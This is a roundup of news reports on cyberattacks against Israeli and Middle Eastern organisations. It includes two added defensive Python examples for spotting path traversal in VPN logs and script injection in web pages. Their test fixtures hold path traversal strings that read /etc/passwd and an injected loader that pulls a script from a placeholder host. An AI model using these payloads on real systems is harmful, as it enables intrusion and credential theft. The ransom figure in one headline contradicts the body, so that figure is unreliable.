
Polonium Assaults Against Israeli Organizations were Blocked by Microsoft


Microsoft stated it has blocked a hacking group known as Polonium, based in Lebanon, from using the OneDrive cloud storage platform for data exfiltration and command and control while attacking and compromising Israeli firms. The company's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications built by Polonium and notified affected organizations, in addition to deleting the accounts created by the Lebanon-based group. 

"Across the majority of its victims, this attacker has deployed unique tools that abuse lawful cloud services for command and control (C2)," according to Microsoft's research. "POLONIUM was seen generating and using legal OneDrive accounts, then using those accounts as C2 to carry out part of the offensive operation," the report says. 

POLONIUM has been seen operating on or targeting various organizations previously penetrated by the Iran-linked MuddyWater APT (aka MERCURY). 

Since February 2022, the group is believed to have breached more than 20 Israeli organizations and one intergovernmental body with operations in Lebanon. Manufacturing, IT, transportation, defense, government, agriculture, finance, and healthcare companies were among the targets of interest; in one case a cloud service provider was compromised to reach a downstream aviation company and law firm in a supply chain attack.

Unpatched Fortinet FortiOS SSL VPN servers vulnerable to CVE-2018-13379, a critical path traversal flaw that allows theft of login credentials, appear to be the initial access vector for the vast majority of victims, according to Microsoft. In November 2020, a hacker disclosed the passwords for nearly 50,000 vulnerable Fortinet VPNs, just days after a list of CVE-2018-13379 one-line exploits was publicly disclosed. 
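Because path traversal against an SSL VPN login endpoint leaves a recognizable trace in the web server access log, a defender can retro-hunt for it. The following is an added example written for this page, not Microsoft's or Fortinet's code: it parses constructed access-log lines (the `/remote/login` path, the `lang` parameter, and the IP addresses are hypothetical), decodes the request target repeatedly to defeat double and triple URL encoding, collapses repeated slashes, and flags any request containing a `..` path segment.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from any real device).
# Documentation IP ranges are used; the path and "lang" parameter are hypothetical.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2020:10:01:02 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 512
203.0.113.9 - - [10/Nov/2020:10:01:05 +0000] "GET /remote/login?lang=/../../../../etc/passwd HTTP/1.1" 200 2048
203.0.113.9 - - [10/Nov/2020:10:01:06 +0000] "GET /remote/login?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048
203.0.113.9 - - [10/Nov/2020:10:01:07 +0000] "GET /remote/login?lang=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2048
198.51.100.4 - - [10/Nov/2020:10:02:00 +0000] "GET /static/img/logo.png HTTP/1.1" 200 9812
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)


def normalize_target(target, rounds=3):
    """URL-decode up to `rounds` times (catches %252e-style double encoding),
    unify backslashes, and collapse runs of slashes."""
    decoded = target
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    return re.sub(r"/{2,}", "/", decoded)


def has_traversal(target):
    """True if any path or query-value segment of the normalized target is '..'."""
    segments = re.split(r"[/?=&]", normalize_target(target))
    return ".." in segments


def detect_traversal(log_text):
    """Return (ip, status, normalized_target) for every request that carries a traversal."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and has_traversal(m["target"]):
            alerts.append((m["ip"], int(m["status"]), normalize_target(m["target"])))
    return alerts


def summarize_by_source(alerts):
    """Count alerts per source IP so repeat offenders stand out."""
    counts = {}
    for ip, _status, _target in alerts:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = detect_traversal(SAMPLE_LOG)
    for ip, status, target in hits:
        print(f"{ip} status={status} target={target}")
    print(summarize_by_source(hits))
```

A `200` status on a flagged request deserves priority over a `404`, since it suggests the server actually served the requested file; the decoded target in each alert shows what the request resolved to after normalization.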

A list of roughly 500,000 Fortinet VPN passwords supposedly harvested from vulnerable devices was posted online again almost a year later. The actor's attack chains have included custom tools named CreepyDrive and CreepyBox, which use legitimate cloud services, OneDrive and Dropbox accounts respectively, for C2 against its victims.

This isn't the first time Iranian threat actors have used cloud services to their advantage. Cybereason revealed in October 2021 that a group called MalKamak ran an attack campaign that used Dropbox for C2 communications to stay under the radar. 

MSTIC also stated that several of the victims breached by Polonium had previously been targeted by another Iranian entity known as MuddyWater (aka Mercury), which the US Cyber Command has described as a "subordinate element" under MOIS. The victim overlap supports previous reports that MuddyWater is a "conglomerate" of several teams, similar to Winnti (China) and the Lazarus Group (North Korea). 

To counter such risks, customers are encouraged to implement multi-factor authentication and to review and audit partner relationships so that any unnecessary permissions are removed.

Top Israeli Officials Duped by Bearded Barbie Hackers


Cybercriminals appear to be aggressively promoting the Remcos RAT, which first appeared in hacking forums in 2016 and has been marketed, sold, and offered as cracked copies on a variety of websites and forums. In 2017, researchers discovered Remcos being distributed via a malicious PowerPoint slideshow with a CVE-2017-0199 exploit. Remcos RAT is a piece of commercial software that may be purchased online. 

An "elaborate effort" targeting high-profile Israeli individuals working in critical defense, law enforcement, and emergency services sectors has been traced to a threat actor associated with Hamas' cyber warfare section. The Hamas-backed hacker outfit dubbed 'APT-C-23' was discovered catfishing Israeli officials in defense, law enforcement, and government institutions, resulting in the deployment of new malware. 

Before delivering spyware, the campaign uses advanced social engineering techniques such as creating phony social media identities and building a strong rapport with the targets. AridViper, another name for the group, has previously targeted Palestinian law enforcement, military, and educational institutions, as well as the Israel Security Agency (ISA), with spear-phishing attacks. Researchers from Cisco Talos discovered AridViper attacks against activists involved in the Israel-Palestine conflict in February.

The attackers have built several phony Facebook profiles using forged credentials and stolen or AI-generated photographs of attractive women, and have used these profiles to approach their targets. The operators spent months curating these profiles to make them appear legitimate, posting in Hebrew and liking organizations and prominent pages in Israel. The profiles build a friend network of real people who work in Israel's police, defense forces, emergency services, or government. After building trust by chatting with a target for a while, the operators suggest moving the conversation to WhatsApp, ostensibly for more privacy. 

The Android app the target is then asked to install, presented as Wink Chat, is actually the VolatileVenom malware. Its icon is hidden on pre-Android 10 devices; on Android 10, the malware uses the Google Play installer icon instead. When the victim tries to sign into Wink Chat, an error message appears stating that the app will be deleted, while VolatileVenom continues to run in the background with a wide spectrum of espionage capabilities. 

As part of the catfishing, the attackers eventually send the target a RAR file supposedly containing explicit photographs or videos. The RAR file actually contains the Barb(ie) downloader, which installs the BarbWire backdoor. A Barb(ie) sample detected by Cybereason carries the filename "Windows Notifications"; when run, it performs basic anti-analysis checks and, if the host is deemed suitable, connects to an embedded C2 server. 

The C2 server then delivers the BarbWire backdoor. The downloader also has a fallback mechanism for locating a different C2: the attackers can simply send an SMS message containing the new destination, since the downloader intercepts all inbound SMS messages, extracts the new C2 details from one sent by the attackers, and proceeds to install the backdoor. BarbWire steals data from PDFs, Office files, archives, image files, videos, and photos, among other file types. It also checks for external media, such as a CD-ROM, implying it is hunting for highly sensitive material that is carried physically rather than only over the internet. The stolen data is packed into a RAR archive and sent to the attackers' C2 server. 

APT-C-23 employs several techniques used in previous operations against Israeli targets, but it is constantly evolving with new tools and more intricate social engineering. The lack of overlapping infrastructure distinguishes Operation Bearded Barbie from past campaigns, indicating the group's aim of avoiding detection. Another escalation for the threat actor is the use of two backdoors, one for Windows and one for Android, enabling very active espionage against the compromised targets.

Israeli Spyware Firm Linked to Watering Hole Attacks on Middle East and UK Websites


ESET researchers have discovered a new cyber campaign that used malware from Candiru, a Tel Aviv-based firm, to target websites and services in various Middle Eastern nations, including Saudi Arabia and Iran. 

Candiru, like NSO Group, sells malware to government agencies, and the US placed it on a trade blacklist earlier this month, along with a Russian corporation and a Singapore-based company. The latest campaign uses 'watering hole' attacks, in which attackers plant malicious code on legitimate websites that the targets are likely to visit. When a user visits the page, the malware infects their computer, allowing the attackers to eavesdrop on them or harm them in other ways. 
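Watering hole injections of the kind described above, a foreign script tag or inline loader added to an otherwise legitimate page, can be caught by comparing a site's script inventory against a known-good baseline. The code below is an added example for this page, not ESET's tooling or anything from the campaign: it parses constructed HTML (the `/static/js/app.js` path and the `cdn.example-invalid.test` host are hypothetical), records external script URLs and SHA-256 hashes of inline script bodies, and reports what appeared or disappeared relative to the baseline.

```python
import hashlib
from html.parser import HTMLParser

# Constructed known-good snapshot of a site's page (hypothetical content).
BASELINE_HTML = """<html><head>
<script src="/static/js/app.js"></script>
<script>window.siteConfig = {"lang": "en"};</script>
</head><body><p>Latest news</p></body></html>"""

# Constructed snapshot of the same page after an injection: one new external
# script and one new inline loader were added; everything else is unchanged.
TAMPERED_HTML = """<html><head>
<script src="/static/js/app.js"></script>
<script>window.siteConfig = {"lang": "en"};</script>
<script src="https://cdn.example-invalid.test/stats.js"></script>
<script>(function(){var s=document.createElement("script");
s.src="https://cdn.example-invalid.test/loader.js";document.head.appendChild(s);})();</script>
</head><body><p>Latest news</p></body></html>"""


class ScriptInventory(HTMLParser):
    """Collects external <script src> URLs and SHA-256 digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src.strip())
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data, so we just buffer it.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            body = "".join(self._buf).strip()
            self.inline.add(hashlib.sha256(body.encode("utf-8")).hexdigest())
            self._in_inline = False


def inventory(html):
    """Return the set of external script URLs and inline script hashes in a page."""
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    return {"external": parser.external, "inline": parser.inline}


def script_drift(baseline_html, current_html):
    """Diff the current page's script inventory against the baseline."""
    base, cur = inventory(baseline_html), inventory(current_html)
    return {
        "new_external": sorted(cur["external"] - base["external"]),
        "new_inline": sorted(cur["inline"] - base["inline"]),
        "removed_external": sorted(base["external"] - cur["external"]),
    }


def is_clean(drift):
    """True when nothing was added or removed relative to the baseline."""
    return not any(drift.values())


if __name__ == "__main__":
    drift = script_drift(BASELINE_HTML, TAMPERED_HTML)
    print("clean" if is_clean(drift) else f"script drift detected: {drift}")
```

In practice the baseline would be taken from a trusted build of the site rather than a live fetch, and any new external host in `new_external` is the first thing to investigate; hashing inline bodies means even a one-character change to an existing inline script shows up as a new hash.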

According to ESET, the websites targeted were Middle East Eye, a London-based news organisation, and Almasirah, a Yemeni news agency linked to the Houthi rebels battling the Saudis. Websites belonging to the Iranian foreign ministry, Yemen's finance and interior ministries, and Syria's energy ministry, as well as internet service providers in Syria and Yemen, were also targeted by the attackers. 

Sites run by the Italian corporation Piaggio Aerospace, the pro-Iranian militant group Hezbollah, and The Saudi Reality, a Saudi Arabian dissident media website, were among the other targets. The attackers also set up a website that mimicked a medical trade show in Germany, the researchers said. ESET believes that certain visitors to these sites were targeted with a browser exploit, although the researchers were unable to obtain the exploit or the payload. 

ESET researcher Matthieu Faou, who uncovered the campaign, stated, "On July 11, 2020, our system notified us that the website of the Iranian embassy in Abu Dhabi had been tainted with malicious JavaScript code. Our curiosity was aroused by the high-profile nature of the targeted website, and in the following weeks we noticed that other websites with connections to the Middle East were also targeted." 

The researchers have detected no activity from this operation since the end of July 2021, when Google, Citizen Lab, and Microsoft released blog articles outlining Candiru's actions - and about the same time that NSO Group became global news.

"The operators appear to be taking a pause, probably in order to retool and make their campaign stealthier," Faou continued. 

Little public information is available about Candiru, which has gone by numerous names since its founding in 2014. Saito Tech Ltd. is the company's current name, and it has several investors in common with NSO Group.  

In July, Citizen Lab and Microsoft researchers stated that more than 100 journalists, politicians, human rights activists, and dissidents in several countries were targeted in a spyware operation that deployed sophisticated 'cyberweapons' created by Candiru. 

Candiru, according to Citizen Lab, sells spyware only to governments and authoritarian leaders, who then use the tools to hijack PCs, Macs, phones, and cloud accounts. For €16 million (£13.4 million), Candiru's clients can attempt to breach an unlimited number of devices, but they can only actively track 10 devices at a time, according to Citizen Lab. Buyers may pay an extra €1.5 million (about £1.25 million) to have Candiru monitor an additional 15 victims.

'Black Shadow' Infiltrates Israeli Finance Firm, Demands $570,000 in Ransom


The private information of thousands of Israelis was compromised on Saturday following a cyberattack on the database of a major Israeli financial services firm. The hacking group called 'Black Shadow' announced on Saturday that it had managed to access the servers of the Israeli financial services firm KLS Capital. 

“We are here to inform you a (sic) cyber-attack against K.L.S CAPITAL LTD which is in Israel. Their servers are down and we have all their clients’ information. We want to leak some part of their data gradually. Part of our negotiation will be published later,” the group wrote on the Telegram app.

The hackers demanded 10 bitcoins ($60,000) in ransom from the Israeli investment firm, but it refused to negotiate. As a result, the hacker group leaked the obtained data on their Telegram channel. Black Shadow is the same hacking group that carried out a major cyberattack against Shirbit insurance company in December. 

A few hours before making the declaration, the hacking group deliberately published blurred images of the identification cards of two people who work with the firm. A few minutes after the announcement, they published a few more documents and have since published dozens of additional documents including identity cards, letters, invoices, images, scanned checks, database information, and much more, including the private information of the CEO of the firm.

Last year in December, a prominent cybersecurity firm reached out to KLS Capital and alerted it to a potential breach, flagging a vulnerability associated with its VPN. The firm said there was a simple patch that would address the issue; however, it appears that no action was taken at the time.

In response, KLS capital stated: “The Israeli cyber authority reached out to us three days ago to warn us against a looming cyber attack against us. This attack is very similar to other attacks Iran and its proxies have conducted against Israeli targets – including private and public bodies. Our management acted immediately to take down our servers and join forces with the national cyber directorate – which together with our experts are examining the event.” 

In recent months, threat actors have targeted several Israeli organizations, including the Shirbit insurance company, the Amital software company, Ben-Gurion University of the Negev, and Israel Aerospace Industries.

Threat Actors Attacked Israeli Tech Giant Ness Digital Engineering for Ransom


Ness Digital Engineering, an IT provider with operations in Israel and the United States, was hit by a ransomware attack affecting its computer networks in India, the United States, and Israel. No official statement has been given to the media by the local authorities, but initial reports suggest a high probability that Israel was the source of the attack, which then reached Ness branches around the globe.

Shahar Efal, CEO of Ness Israel, said that the company's clients, which include government ministries, hospitals, and local municipalities, were not compromised in the attack: "All our systems had been tested by the experts and there is not a single breach into the company's network or in its client's database." Cybersecurity experts say the real question is whether the company's supply chain is intact or was breached in the attack; so far there are no reports of negotiations with the threat actors.

“The attack began last night, it is a serious, ongoing event. The company is trying to contain the attack internally and seemed, thus far, to have successfully contained it without risking customers”, a source involved in managing the attack told Ynet. The company reassured its clients by reiterating that Ness Israel was no longer connected to the global corporation and therefore was not affected by the cyberattack.

The company has worked with several other companies and government bodies, including the IDF, Israel Aerospace Industries, Israel Post, the Israel Airports Authority, and the Hebrew University. The National Cyber Directorate stated that this attack has no connection with Israel. Meanwhile, cybersecurity consultant Einat Meyron said that more than 150 servers in Israel and 1,000 servers around the globe are being examined by McAfee.

A screenshot of the text presented as a part of the ransomware attack reads “Hello ness-digital-engineering! If you (sic) reading this message, it means your network was PENETRATED and all of your files and data has (sic) been ENCRYPTED by RAGNAR LOCKER!” The text directs the company to get in touch via live chat provided in the text to sort out the case and “make a deal”.

The Ragnar Locker technique used by the threat actors is to gain access to a victim's network, explore it to locate network assets, backups, and other critical files, and then manually deploy the ransomware to encrypt the victim's data.